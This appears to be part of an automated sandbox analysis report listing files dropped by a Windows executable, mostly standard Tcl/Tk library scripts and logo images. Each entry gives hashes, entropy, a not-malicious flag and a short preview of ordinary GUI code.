                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# button.tcl --..#..# This file defines the default bindings for Tk label, button,..# checkbutton, and radiobutton widgets and provides procedures..# that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 2002 ActiveState Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for buttons...#-------------------------------------------------------------------------....if {[tk windowingsystem] eq "aqua"} {.... bind Radiobutton <Enter> {...tk::ButtonEnter %W.. }.. bind Radiobutton <1> {...tk::ButtonDown %W.. }.. bind Radiobutton <ButtonRelease-1> {...tk::ButtonUp %W.. }.. bind Checkbutton <Enter> {...tk::ButtonEnter %W
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9960
                                                                                                                                                                                                                              Entropy (8bit):4.802555950168837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HKOdkMpU9YUp8UIhMYYicln9Die0luVZat3pIp5Y3sF1P8Bg8p6trIOzvKsOiCLU:HyMm9J8wPx70luex4C8Fygq6tohef+0J
                                                                                                                                                                                                                              MD5:818E4F0112931F12B4FAC4CAD262814C
                                                                                                                                                                                                                              SHA1:AC7060DF952F9DB52C3687B8F5E6AA4ADF06992E
                                                                                                                                                                                                                              SHA-256:35B208E8570B0D1E0CA1C911D4FE02EE3B0CFE5667CF1BDEC006CF9D043122BA
                                                                                                                                                                                                                              SHA-512:0C535B6621BC83412B7A64CB6AC2BA526B8E49BB5F6BC5EBEDA41D223D68DEB031DB9C8A31F8671BC5F327D720942E7FDAE3328334B0B550AC991191F96909D6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# choosedir.tcl --..#..#.Choose directory dialog implementation for Unix/Mac...#..# Copyright (c) 1998-2000 by Scriptics Corporation...# All rights reserved.....# Make sure the tk::dialog namespace, in which all dialogs should live, exists..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}....# Make the chooseDir namespace inside the dialog namespace..namespace eval ::tk::dialog::file::chooseDir {.. namespace import -force ::tk::msgcat::*..}....# ::tk::dialog::file::chooseDir:: --..#..#.Implements the TK directory selection dialog...#..# Arguments:..#.args..Options parsed by the procedure...#..proc ::tk::dialog::file::chooseDir:: {args} {.. variable ::tk::Priv.. set dataName __tk_choosedir.. upvar ::tk::dialog::file::$dataName data.. Config $dataName $args.... if {$data(-parent) eq "."} {.. set w .$dataName.. } else {.. set w $data(-parent).$dataName.. }.... # (re)create the dialog box if necessary.. #.. if {![winfo exis
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22103
                                                                                                                                                                                                                              Entropy (8bit):5.03166227244502
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:lJGidpe3JQDUd6hgp6EQstzQf+a9DPbS43/H//cO802UeeVnZmM6BA0kyVJv9Qpu:Gep6JCwQDPbLPaRCzTdMAe
                                                                                                                                                                                                                              MD5:AD86E0265C307348A16E9E4B64D8F235
                                                                                                                                                                                                                              SHA1:66EC6726DF997EE6096F642EBBBDB8C3201BA571
                                                                                                                                                                                                                              SHA-256:D210DCFA9ADB4C23E44EBF744839158CAB4E21EACF9483C6BA91BA6EC4660EB8
                                                                                                                                                                                                                              SHA-512:A0C9DF815FE54C26EED69C84B29FD829EB1B7E43D2787E98C71D091607226532F6F0E9213E83FF8263FCB6DA892178029D5EF475FD46D22F9BB8AB31B87BF438
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# clrpick.tcl --..#..#.Color selection dialog for platforms that do not support a..#.standard color selection dialog...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# ToDo:..#..#.(1): Find out how many free colors are left in the colormap and..#. don't allocate too many colors...#.(2): Implement HSV color selection...#....# Make sure namespaces exist..namespace eval ::tk {}..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::color {.. namespace import ::tk::msgcat::*..}....# ::tk::dialog::color:: --..#..#.Create a color dialog and let the user choose a color. This function..#.should not be called directly. It is called by the tk_chooseColor..#.function when a native color selector widget does not exist..#..proc ::tk::dialog::color:: {args} {.. variable ::tk::Priv.. set dataName __tk__color.. upvar ::tk::dialog::color::$da
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8690
                                                                                                                                                                                                                              Entropy (8bit):5.098389551322902
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:u4R7+/gFw/MEN55fO7eyjt4bjC+gR8e3vwLln/+LVtUw0tXK4jA:u4l+/gFeMI55Xyjt4bjC+gOe3Ih/+LV1
                                                                                                                                                                                                                              MD5:ABF277E4F62423F4345B6AD65640B8C2
                                                                                                                                                                                                                              SHA1:E66A4E37D51C7827C9ACA449A42E0966AACBC8C8
                                                                                                                                                                                                                              SHA-256:C7DA292CCF5F413E599C3491C331FFD58CF273F8477FACB097E6F36CF1F32A08
                                                                                                                                                                                                                              SHA-512:AA9F75D7C5C915B5FCD2F454856D080D186AB9BA149DC139FEAF7F4AC3DC51E6769E138E3B1BE45B3FEC3AE744189DE44DB2B748F0628FF13E4E733B9CD68BD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# comdlg.tcl --..#..#.Some functions needed for the common dialog boxes. Probably need to go..#.in a different file...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# tclParseConfigSpec --..#..#.Parses a list of "-option value" pairs. If all options and..#.values are legal, the values are stored in..#.$data($option). Otherwise an error message is returned. When..#.an error happens, the data() array may have been partially..#.modified, but all the modified members of the data(0 array are..#.guaranteed to have valid values. This is different than..#.Tk_ConfigureWidget() which does not modify the value of a..#.widget record if any error occurs...#..# Arguments:..#..# w = widget record to modify. Must be the pathname of a widget...#..# specs = {..# {-commandlineswitch resourceName ResourceClass defaultValue verifier}..# {....}..# }..#..# flags
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33347
                                                                                                                                                                                                                              Entropy (8bit):4.995865221021151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:jMpwGU6OGEJemVueuR3fitsHI76Su6qKQjGCy1HyOnmTTRV+po2mBh6S5mDjbHqC:jMpdUDGEJpC6+oVeKQPjnD2jVfV/
                                                                                                                                                                                                                              MD5:4CA2E90A125FFD6191D0C5AC6818D18F
                                                                                                                                                                                                                              SHA1:855F10234FA1D65521C2508206EA58DC565E452B
                                                                                                                                                                                                                              SHA-256:A4B21DBF699C20EA5AC334EC109F731BE8EB2B8F9A34CCC2EBE538F4BF8A05F8
                                                                                                                                                                                                                              SHA-512:ED5AE05A7F1D379F8343FF4AD7EF561C5C4D9B7E02399A7281DF8B8930B924B0482FDC5B4E3F90C2214ADA4F87D9A5E64DB2259194C58A2135D969C01BBE64F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# console.tcl --..#..# This code constructs the console window for an application. It..# can be used by non-unix systems that do not have built-in support..# for shells...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# TODO: history - remember partially written command....namespace eval ::tk::console {.. variable blinkTime 500 ; # msecs to blink braced range for.. variable blinkRange 1 ; # enable blinking of the entire braced range.. variable magicKeys 1 ; # enable brace matching and proc/var recognition.. variable maxLines 600 ; # maximum # of lines buffered in console.. variable showMatches 1 ; # show multiple expand matches.. variable useFontchooser [llength [info command ::tk::fontchooser]
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5988
                                                                                                                                                                                                                              Entropy (8bit):4.829498876074983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:qFR55woFFEciKwKClFEOTIhDHWyzaoj9zza7v0J7:qL55jiKwKCzTIhDbzaojhSG7
                                                                                                                                                                                                                              MD5:B2B3AA971D42FDBF92F13B45111EE1D3
                                                                                                                                                                                                                              SHA1:A74F2C2707463D6E209D0E0C96D75083AC6920A5
                                                                                                                                                                                                                              SHA-256:1C977052C1D8293CC5FE4198A538BECA9BC821AF85E76E4EEFBFB75B33CE8BED
                                                                                                                                                                                                                              SHA-512:146F658DA3E6E9176FA51C9836D7C1DCFC14E148A26B224155F6493C195A7FB20C2DC4EE21994E5A193B8DA8561C75374E830304F94F0C844E52AD829F6810D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# dialog.tcl --..#..# This file defines the procedure tk_dialog, which creates a dialog..# box containing a bitmap, a message, and one or more buttons...#..# Copyright (c) 1992-1993 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..# ::tk_dialog:..#..# This procedure displays a dialog box, waits for a button in the dialog..# to be invoked, then returns the index of the selected button. If the..# dialog somehow gets destroyed, -1 is returned...#..# Arguments:..# w -..Window to use for dialog top-level...# title -.Title to display in dialog's decorative frame...# text -.Message to display in dialog...# bitmap -.Bitmap to display in dialog (empty string means none)...# default -.Index of button that is to display the default ring..#..(-1 means none)...# args -.One or more strings to display in buttons
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18440
                                                                                                                                                                                                                              Entropy (8bit):4.982597499983157
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:mDfyPIlBk3yrt8qLjtpa+qh+rA4rsWRWrrMUtCPnkKYNlPp64ZnCD:mDfyPIlBk3yJ8mtpaplcp6o
                                                                                                                                                                                                                              MD5:007F42FBCDC57652AC8381F11AF7FB67
                                                                                                                                                                                                                              SHA1:1BB1B0FCAD6F5633D1BEB8903112F180B1C4BA7F
                                                                                                                                                                                                                              SHA-256:65BA33A1E0B21E8E074780A51189CEE6FD9926C85273E9E7633987FC212A17B2
                                                                                                                                                                                                                              SHA-512:A27089719ADAFC48B5ABB905E40D0C6A0A2507526223D72C1CFF36AB7C15362C6F0B8EE5775181BA1730852802AFA64631EE3720E624B630E3274BFB32F6A59A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# entry.tcl --..#..# This file defines the default bindings for Tk entry widgets and provides..# procedures that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#...start dragging out a selection)...# pressX -..X-coordinate at which the mouse button was pressed...# selectMode -..The style of selection currently underway:..#...char, word
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5035
                                                                                                                                                                                                                              Entropy (8bit):4.819523401259934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:J3MRZZ7HWb/6OgRKjtS6Mn9GRZZ7HWb2Y6aO6R5nh76SMoB2kd82KtTpsi2D0DSn:CRZdPul1RZdFaRf0XoB2gZKZpsi2pn
                                                                                                                                                                                                                              MD5:63B219BE9AFF1DE7DE2BAF0E941CAE38
                                                                                                                                                                                                                              SHA1:A2FEBB31380E12FF01E6F641FE8B4F815941462F
                                                                                                                                                                                                                              SHA-256:8872F236D7E824AEC0ACD4BACC00FDD7EC9BC5534814ECF2160610C10647B7C5
                                                                                                                                                                                                                              SHA-512:057700F8FDE4B7C3D7AB7CEFD6C531060BF2B1B3B727CAD6A37ECD42EBC557765D94B83ADD438BD5AFA1F6F919D80AE755A8D98918981167B871F31AD42FDF5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# focus.tcl --..#..# This file defines several procedures for managing the input..# focus...#..# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_focusNext --..# This procedure returns the name of the next window after "w" in..# "focus order" (the window that should receive the focus next if..# Tab is typed in w). "Next" is defined by a pre-order search..# of a top-level and its non-top-level descendants, with the stacking..# order determining the order of siblings. The "-takefocus" options..# on windows determine whether or not they should be skipped...#..# Arguments:..# w -..Name of a window.....proc ::tk_focusNext w {.. set cur $w.. while {1} {.....# Descend to just before the first child of the current widget......set parent $cur...set children [winfo children $cur]...set i -1.....# Look for the next sibling that isn't a top-leve
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                                                              Entropy (8bit):4.723225284452692
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NoRqdguMCeor/4VxgU80zNxWHKVozN5EaKdhsbyM:NoRqdguMCeor/4VxgUnzN0KSDEk
                                                                                                                                                                                                                              MD5:CFA99C2D3F02AE6538809774699A9CE7
                                                                                                                                                                                                                              SHA1:DADB7B3D1D9531710BA7D3025CE18F6F8149F280
                                                                                                                                                                                                                              SHA-256:4EE521F4980A5056077005B748717D91CB6B17342CDD20135962AB92A665B580
                                                                                                                                                                                                                              SHA-512:DCF54AAEA439C986AE28CEC0241F204BB5001DE4E98C2E7A9C282F9E47747AD62E9B2CF6FBBAC068BF1F1BB0AAC866F85476E9EE79935CE1E3656F122C2D002D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# fontchooser.tcl -..#..#.A themeable Tk font selection dialog. See TIP #324...#..# Copyright (C) 2008 Keith Vetter..# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::fontchooser {.. variable S.... set S(W) .__tk__fontchooser.. set S(fonts) [lsort -dictionary -unique [font families]].. set S(styles) [list \.. [::msgcat::mc Regular] \.. [::msgcat::mc Italic] \.. [::msgcat::mc Bold] \.. [::msgcat::mc {Bold Italic}] \.. ].. set S(sizes) {8 9 10 11 12 14 16 18 20 22 24 26 28 36 48 72}.. set S(strike) 0.. set S(under) 0.. set S(first) 1.. set S(-parent) ... set S(-title) {}.. set S(-command) "".. set S(-font) TkDefaultFont.. set S(bad) [list ]..}....proc ::tk::fontchooser::Canonical {} {.. variable S.... foreach style $S(styles
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17565
                                                                                                                                                                                                                              Entropy (8bit):4.959816621842895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:FNP8nO9Wo8k5NfQH8EsOy8WMdbffNCvHshPOw7jW:FNf8uNfQH89Z8WMdz1vDW
                                                                                                                                                                                                                              MD5:FDB839B85C4CEB34DEC04E0EBD6A3C96
                                                                                                                                                                                                                              SHA1:0FD8981093CC6ED9927D1DDE708FECE84B9C5E6F
                                                                                                                                                                                                                              SHA-256:07812124D27E47621AF74FDB90C777D3219B02F657FC2F97F606C69EF9468A01
                                                                                                                                                                                                                              SHA-512:E65616B3F6BDC3910FC90E9710426370AA4B0A0D9EB6289871B9C30A98A2F2B5CC1E471B63203210AAE89120F20F164A33E01DA45BCCCCCEC7BFC1CCFD70FAC7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# iconlist.tcl..#..#.Implements the icon-list megawidget used in the "Tk" standard file..#.selection dialog boxes...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...# Copyright (c) 2009 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# API Summary:..#.tk::IconList <path> ?<option> <value>? .....#.<path> add <imageName> <itemList>..#.<path> cget <option>..#.<path> configure ?<option>? ?<value>? .....#.<path> deleteall..#.<path> destroy..#.<path> get <itemIndex>..#.<path> index <index>..#.<path> invoke..#.<path> see <index>..#.<path> selection anchor ?<int>?..#.<path> selection clear <first> ?<last>?..#.<path> selection get..#.<path> selection includes <item>..#.<path> selection set <first> ?<last>?.....package require Tk....::tk::Megawidget create ::tk::IconList ::tk::FocusableWidget {.. variable w canvas sbar accel accelCB fill font index \...itemList itemsPerColumn list
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11037
                                                                                                                                                                                                                              Entropy (8bit):6.048349526382653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0nEPytJLl1S47T3YqN5/vkJpnhXqBB4aw2rqZiygTtYTpOq/pc75Mk:xqLz7F5KTqBBLuZ1gTSsqhk
                                                                                                                                                                                                                              MD5:995A0A8F7D0861C268AEAD5FC95A42EA
                                                                                                                                                                                                                              SHA1:21E121CF85E1C4984454237A646E58EC3C725A72
                                                                                                                                                                                                                              SHA-256:1264940E62B9A37967925418E9D0DC0BEFD369E8C181B9BAB3D1607E3CC14B85
                                                                                                                                                                                                                              SHA-512:DB7F5E0BC7D5C5F750E396E645F50A3E0CDE61C9E687ADD0A40D0C1AA304DDFBCEEB9F33AD201560C6E2B051F2EDED07B41C43D00F14EE435CDEEE73B56B93C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# icons.tcl --..#..#.A set of stock icons for use in Tk dialogs. The icons used here..#.were provided by the Tango Desktop project which provides a..#.unified set of high quality icons licensed under the..#.Creative Commons Attribution Share-Alike license..#.(https://creativecommons.org/licenses/by-sa/3.0/)..#..#.See http://tango.freedesktop.org/Tango_Desktop_Project..#..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::icons {}....image create photo ::tk::icons::warning -data {.. iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABSZJREFU.. WIXll1toVEcYgL+Zc87u2Yu7MYmrWRuTJuvdiMuqiJd4yYKXgMQKVkSjFR80kFIVJfWCWlvpg4h9.. 8sXGWGof8iKNICYSo6JgkCBEJRG8ImYThNrNxmaTeM7pQ5IlJkabi0/9YZhhZv7///4z/8zPgf+7.. KCNRLgdlJijXwRyuDTlcxV9hbzv8nQmxMjg+XDtiOEplkG9PSfkztGmTgmFQd+FCVzwa3fYN/PHZ.. AcpBaReicW5xcbb64IEQqko8Lc26d/58cxS+/BY6hmJvyEfQBoUpwWCmW1FErKaGWHU13uRk4QkE.. UtxQNFR7QwIoB4eiKD9PWbVKbb10CZmaCqmpxCormRYO26QQx85B0mcD+AeK0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):329
                                                                                                                                                                                                                              Entropy (8bit):4.3973643486226655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:nVxpJFBmHdeA1xNZgk0dIf3Ju4dFi6/XWrWhr3W7FxmVFraazmVAJFKyVQR7icr8:nj5Bqf1fZgp6A4FDG6dm7FUGAJVVMRmn
                                                                                                                                                                                                                              MD5:921245A21F7E783997DC7B859AF1B65B
                                                                                                                                                                                                                              SHA1:2EFE3C8F70CF18621006890BF21CC097770D140D
                                                                                                                                                                                                                              SHA-256:C6DB098EBD8A622164D37D4AB0A8C205DB1A83AC3065D5CDE3CB5FB61925D283
                                                                                                                                                                                                                              SHA-512:CAD823FF3D13A64C00825961E75B5133690556FB1F622834F8B1DF316A9E75BABB63B9F5148DAE7B1391123B4C8D55B4B8B2EB6F8E6E1DA9DE02A5BD7AC0FD6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:README - images directory....This directory includes images for the Tcl Logo and the Tcl Powered..Logo. Please feel free to use the Tcl Powered Logo on any of your..products that employ the use of Tcl or Tk. The Tcl logo may also be..used to promote Tcl in your product documentation, web site or other..places you so desire...
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34991
                                                                                                                                                                                                                              Entropy (8bit):5.248845410801251
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:0YrY6a0v4uIqYMEKjodQKOfRXMLcSqDGpfTKFVm3AsanMEDzzBHWzaw7XUbTJjoB:0YrY6aeIqYMEKjouzfRXMLcSqDGpfTKo
                                                                                                                                                                                                                              MD5:23C4EDED40DEC065F99E6653AEE1BB31
                                                                                                                                                                                                                              SHA1:3175E261BE198731DEDB07264CCB84C8DEDF7967
                                                                                                                                                                                                                              SHA-256:76207D8DFDE189A29DC0E76ADB7EAAA606B96BC6C1C831F34D1C85B1C5B51DD3
                                                                                                                                                                                                                              SHA-512:BA139A64BE72BB681040924C4294E2726BA5AB243E805E60A854D2D23E154705E2431D1AB2DE732BFA393747FD30D8A5C913895CBE1463DBF50CC23CAE5B0454
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL/TK LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:58 PM)..%%BoundingBox: 251 331 371 512..%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%DocumentCustomColors: (TCL RED)..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe Illustrator
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2341
                                                                                                                                                                                                                              Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                              MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                              SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                              SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                              SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1670
                                                                                                                                                                                                                              Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                              MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                              SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                              SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                              SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
